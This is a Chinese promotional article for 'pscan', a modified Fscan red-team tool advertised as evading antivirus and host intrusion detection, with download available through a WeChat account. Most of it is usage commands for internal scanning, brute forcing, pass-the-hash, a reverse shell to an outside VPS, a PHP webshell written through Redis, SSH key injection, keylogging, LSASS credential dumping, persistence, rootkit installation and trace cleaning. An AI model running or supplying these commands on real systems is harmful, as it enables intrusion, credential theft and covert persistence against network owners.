当前位置: 首页 > news >正文

红队内网渗透利器,告别原版特征暴露(支持免杀)内网扫描爆破后渗透一站式落地

0x01 工具介绍

pscan作为红队专属内网渗透新利器,基于Fscan最新版本二次魔改优化,彻底告别原版工具特征暴露问题,完美支持主流安全软件免杀绕过。工具重构全部命令参数、去除官方指纹特征,支持静默无痕迹运行,集内网存活探测、端口扫描、弱口令爆破、POC漏洞检测、后渗透利用功能于一体,实现内网渗透全流程一站式落地,适配各类实战攻防场景。

注意:现在只对常读和星标的才展示大图推送,建议大家把渗透安全HackTwo"设为星标⭐️"则可能就看不到了啦!

下载地址在末尾 #渗透安全HackTwo

0x02 功能介绍

✨魔改版本功能

本版本对原版 fscan 做了以下修改以规避 HIDS 特征检测:

修改项说明
参数名混淆所有命令行参数重命名(见下方映射表)
Banner 静默启动时不输出 fscan ASCII Logo 和版本信息
模块名重命名Go 模块路径改为scanner/core,去除项目名特征
预编译二进制提供pscan.execore.exe两个版本

免杀效果

原版 ↔ 魔改参数映射:

原参数魔改后说明
-h-t目标 IP / 网段 / 域名
-eh-et排除主机
-ehf-etf排除主机文件
-p-tp端口
-ep-etp排除端口
-hf-tf主机列表文件
-pf-tpf端口列表文件
-m-st扫描模式
-t(线程)-tn端口扫描线程数
-time-tm超时时间(秒)
-user-usr用户名
-pwd-pw密码
-usera-ua额外用户名
-pwda-pa额外密码
-userf-usrf用户名字典文件
-pwdf-pf密码字典文件
-upf-up用户名:密码对文件
-hashf-hf哈希文件
-hash-hv哈希值
-domain-dm域名
-sshkey-skSSH 私钥

后渗透插件列表

通过-local参数调用:

插件名功能平台
systeminfo系统信息收集全平台
reverseshell反弹 Shell全平台
forwardshell正向 ShellWindows
socks5proxy启动 SOCKS5 代理全平台
keylogger键盘记录Windows
minidumpLSASS 凭据提取Windows
sshkeySSH 公钥注入Linux
cleaner痕迹清理全平台
crontaskCron 持久化Linux
systemdserviceSystemd 服务持久化Linux
ldpreloadLD_PRELOAD RootkitLinux
winregistry注册表持久化Windows
winschtask计划任务持久化Windows
winservice服务持久化Windows
winstartup启动项持久化Windows
winlogon登录脚本持久化Windows
winwmiWMI 持久化Windows
winbitsBITS 任务持久化Windows
winifeoIFEO 持久化Windows

WebUI 模式

本工具内置了 Web 管理界面(需使用 web 版本编译)。

# 启动 Web 服务pscan-web.exe# 指定监听端口pscan-web.exe -u# 启动后访问 http://127.0.0.1:8080

WebUI 功能:

  • 图形化扫描任务管理

  • 实时 WebSocket 结果推送

  • 扫描预设保存

  • 资产项目管理

  • 多语言支持(中文/English)

  • 深色模式

0x03 更新介绍

11 个检测模块:SQLi / XSS / CMDi / LFI / RCE / SSRF / XXE / API / 敏感信息 / WAF / JSPathFinder 支持 GUI 图形界面和命令行两种模式 多种报告格式:JSON / HTML / CSV / Markdown / Console 基于 WVS v19.2 开源更名

0x04 使用介绍

📦安装与使用指南

内网扫描

# 全量扫描整个 C 段(最常用) pscan.exe -t 192.168.1.0/24 # 仅存活探测(快速定位在线主机) pscan.exe -t 192.168.1.0/24 -ao # ICMP 模式存活探测 pscan.exe -t 192.168.1.0/24 -st icmp # 存活探测 + 仅在线主机做端口扫描(跳过离线主机) pscan.exe -t 192.168.1.0/24 -ao -st all # 扫描多个网段 pscan.exe -t 192.168.1.0/24,10.10.0.0/16 # 扫描 IP 范围 pscan.exe -t 192.168.1.1-100 # 排除特定主机 pscan.exe -t 192.168.1.0/24 -et 192.168.1.1,192.168.1.254 # 从文件读取目标列表 pscan.exe -tf targets.txt

​​​​​​​

端口与协议控制

# 扫描指定端口 pscan.exe -t 192.168.1.0/24 -tp 22,80,443,3306,3389,6379 # 扫描常用 Web 端口 pscan.exe -t 192.168.1.0/24 -tp 80,81,443,8080,8443,9090 # 扫描全部端口(慢,谨慎使用) pscan.exe -t 192.168.1.0/24 -tp 1-65535 -tn 1000 # 排除特定端口 pscan.exe -t 192.168.1.0/24 -etp 445,139 # 跳过 Ping 探测(纯 TCP 扫描,适合禁 Ping 环境) pscan.exe -t 192.168.1.0/24 -np # 跳过 TCP 补充探测 pscan.exe -t 192.168.1.0/24 -ntp # 调整扫描线程和超时(网络差时降低线程数) pscan.exe -t 192.168.1.0/24 -tn 200 -tm 5 # 限制发包速率(规避流量检测) pscan.exe -t 192.168.1.0/24 -rate 1000

弱口令爆破

# 全量扫描 + 自动爆破(默认开启) pscan.exe -t 192.168.1.0/24 # 禁用爆破(只扫端口和服务识别) pscan.exe -t 192.168.1.0/24 -nobr # 指定自定义凭据 pscan.exe -t 192.168.1.0/24 -usr admin -pw admin123 # 使用字典文件 pscan.exe -t 192.168.1.0/24 -usrf users.txt -pf pass.txt # 使用用户名:密码对文件(每行 user:pass) pscan.exe -t 192.168.1.0/24 -up creds.txt # 添加额外用户/密码(与原字典合并) pscan.exe -t 192.168.1.0/24 -ua root,admin -pa 123456,password # 指定域名(用于域认证爆破) pscan.exe -t 192.168.1.0/24 -dm corp.local # SSH 私钥登录 pscan.exe -t 192.168.1.100 -sk id_rsa # NTLM 哈希传递 pscan.exe -t 192.168.1.100 -hv "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"

Web 扫描

# 扫描单个 Web 站点 pscan.exe -u http://192.168.1.100:8080 # 扫描多个 URL pscan.exe -u http://192.168.1.100 -tp 80,443,8080 # 带 Cookie 扫描 pscan.exe -u http://192.168.1.100 -cookie "PHPSESSID=xxx" # 使用 HTTP 代理 pscan.exe -u http://192.168.1.100 -proxy http://127.0.0.1:8080 # 使用 SOCKS5 代理 pscan.exe -t 192.168.1.0/24 -socks5 socks5://127.0.0.1:1080 # 指定网卡(VPN 场景) pscan.exe -t 10.8.0.0/24 -iface 10.8.0.5

POC 漏洞检测

# 全量扫描 + POC 检测(默认开启) pscan.exe -t 192.168.1.0/24 # 禁用 POC 扫描(加快速度) pscan.exe -t 192.168.1.0/24 -nopoc # 全量 POC 扫描(更全面但更慢) pscan.exe -t 192.168.1.0/24 -full # 指定 POC 名称 pscan.exe -t 192.168.1.100 -pocname thinkphp # 自定义 POC 脚本目录 pscan.exe -t 192.168.1.100 -pocpath ./custom-pocs/ # 调整 POC 并发数 pscan.exe -t 192.168.1.0/24 -num 10 # 启用 DNSLog pscan.exe -t 192.168.1.0/24 -dns

凭据复用与哈希传递

# NTLM 哈希传递(配合爆破模块使用) pscan.exe -t 192.168.1.100 -hv "31d6cfe0d16ae931b73c59d7e0c089c0" # 哈希文件批量传递 pscan.exe -t 192.168.1.0/24 -hf hashes.txt # 复用域用户凭据 pscan.exe -t 192.168.1.0/24 -usr administrator -pw P@ssw0rd -dm corp.local

后渗透利用

# 查看所有可用本地插件 pscan.exe -local list # 收集系统信息 pscan.exe -local systeminfo # 反弹 Shell(先在外网 VPS 监听) pscan.exe -local reverseshell -rsh your-vps.com:4444 # 启动正向 Shell(等待目标连接) pscan.exe -local forwardshell -fsh-port 4444 # 启动 SOCKS5 代理(本地监听 1080) pscan.exe -local socks5proxy -start-socks5 1080 # Redis 写公钥 pscan.exe -t 192.168.1.100 -st redis -rs "ssh-rsa AAAAB3N..." # Redis 写 Webshell pscan.exe -t 192.168.1.100 -st redis -rwp /var/www/html -rwc "<?php system($_GET['cmd']);?>" # 键盘记录 pscan.exe -local keylogger -keylog-output keylog.txt # LSASS 凭证提取 pscan.exe -local minidump # Windows 持久化(启动项) pscan.exe -local winstartup -win-pe C:\shell.exe # 清理痕迹 pscan.exe -local cleaner

输出控制​​​​​​​

# 指定输出文件 pscan.exe -t 192.168.1.0/24 -o scan-result.txt # JSON 格式输出 pscan.exe -t 192.168.1.0/24 -f json -o result.json # CSV 格式输出 pscan.exe -t 192.168.1.0/24 -f csv -o result.csv # 不保存文件,仅屏幕输出 pscan.exe -t 192.168.1.0/24 -no # 静默模式(减少输出量) pscan.exe -t 192.168.1.0/24 -silent # 调试模式(详细日志) pscan.exe -t 192.168.1.0/24 -debug # 输出性能统计 pscan.exe -t 192.168.1.0/24 -perf

下载

《渗透安全HackTwo》回复20260619获取下载

http://www.jsqmd.com/news/1045483/

相关文章:

  • Spring Boot YAML 配置陷阱
  • 【无人机三维路径规划】基于磷虾群算法KH实现复杂地形下无人机避障三维航迹规划附Matlab代码
  • 芯片数据手册修订历史深度解析:从MPC5676R看硬件设计关键要点
  • 如何安全永久激活IDM:3种高效方案完整指南
  • 从零到一:使用PowerDesigner构建高效数据库物理模型
  • 第四章:动态WebAPI开发
  • AI在生物学研究中的真实能力边界与辅助实践
  • 软件价格优化中的动态定价模型
  • 宜春探店 10 家猫犬舍!避坑指南 + Top1 实探,这家 3000㎡基地太放心​ - 同城宠物优选基地
  • 从评估板到产品:WINC1500-XPRO物联网Wi-Fi模块开发全解析
  • LPC43S70 ADC信号完整性优化:从引脚串扰到输入电路设计
  • 赣州购宠避雷!实测 10 家猫犬舍,拒绝星期狗,这家 3000㎡基地才靠谱​ - 同城宠物优选基地
  • 智能功率开关MC07XS6517:输出钳位与数字诊断功能深度解析
  • 2026专业产品认证机构哪家靠谱?资质与服务解析 - 品牌排行榜
  • DeepTutor终极指南:打造您的个人AI学习助手
  • 第六章:数据库操作与EF Core集成
  • 2026漳州2026正规漏水检测维修公司精选口碑榜TOP5权威推荐-精准定位检测漏水点-专业防水补漏堵漏维修、卫生间/厨房/屋顶/天沟/地下室/阳台防水漏水检测维修 - 安佳防水
  • 2026北京靠谱的上门回收字画公司推荐榜单 - 品牌排行榜
  • 3大工程文档管理痛点解决方案:使用kkFileView实现企业级文件在线预览系统
  • MC9S08SH32内存架构与安全机制:从寻址优化到Flash编程实战
  • 深入解析MPC8280 PowerQUICC II:架构、硬件设计与调试实战
  • 2026降AIGC技术白皮书:2026权威工具测评榜与精准避坑指南
  • MPC7410处理器架构解析:AltiVec矢量技术与硬件设计实践
  • 重庆修补家具大理石/瓷砖/岩板/木门补漆推荐良匠千艺2026本地口碑榜 - 我叫一
  • 终极指南:如何用Umi-OCR实现10倍效率的离线文字识别自动化
  • 2026清远本地人必选防水补漏检测维修公司靠谱服务商TOP5推荐:房屋渗漏水检测维修/卫生间/厨房/天花板/阳台/外墙渗漏水检测补漏维修-暗管漏水检测专业仪器精准定位漏水点 - 即刻修防水
  • 5分钟开启AI视频创作:Pixelle-Video让你的创意一键成片
  • MC9S08GT16A/GT8A微控制器:HCS08内核、低功耗模式与硬件设计精解
  • 主机名配置不当引发的sudo解析故障排查指南 _ 统信UOS _ 麒麟KYLINOS
  • 2026年新发布山东靠谱的罐罐酸奶加盟项目深度剖析:为何谷物全书罐罐酸奶成为市场焦点? - 品牌鉴赏官2026